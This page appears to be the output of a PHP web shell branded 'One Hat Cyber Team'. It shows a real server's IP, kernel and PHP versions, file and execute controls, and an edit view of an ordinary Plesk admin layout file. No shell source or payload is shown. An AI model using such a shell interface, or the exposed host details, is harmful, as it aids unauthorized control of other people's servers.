⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
application
/
default
/
layouts
/
Edit File: custom.phtml
<?php // Copyright 1999-2025. WebPros International GmbH. All rights reserved. ?> <?php echo $this->doctype(); ?> <html <?php echo $this->htmlDoc() ?>> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="forgery_protection_token" id="forgery_protection_token" content="<?= Session::get()->panel()->forgeryProtectionToken ?>"> <?php echo $this->headTitle() ?> <?php echo $this->favicon() ?> <?=$GLOBALS['skin']->getThemeCssIncludes()?> <?php echo $this->headStyle() ?> <?php echo $this->headLink() ?> <?php $this->jsLoad()->requireJs(); ?> <?php $this->jsLoad()->prepend('/javascript/main.js'); ?> <?php $this->jsLoad()->prepend('/javascript/vendors.js'); ?> <?php $this->jsLoad()->uiLibrary(); ?> <?php $this->jsLoad()->prepend('/javascript/externals/prototype.js'); ?> <?php echo new \Plesk\UserActivityTracking\View($this); ?> <?php echo $this->headScript(); ?> </head> <?php echo $this->partial('partials/context_header.phtml'); ?> <?php echo $this->layout()->content; ?> </html>
Simpan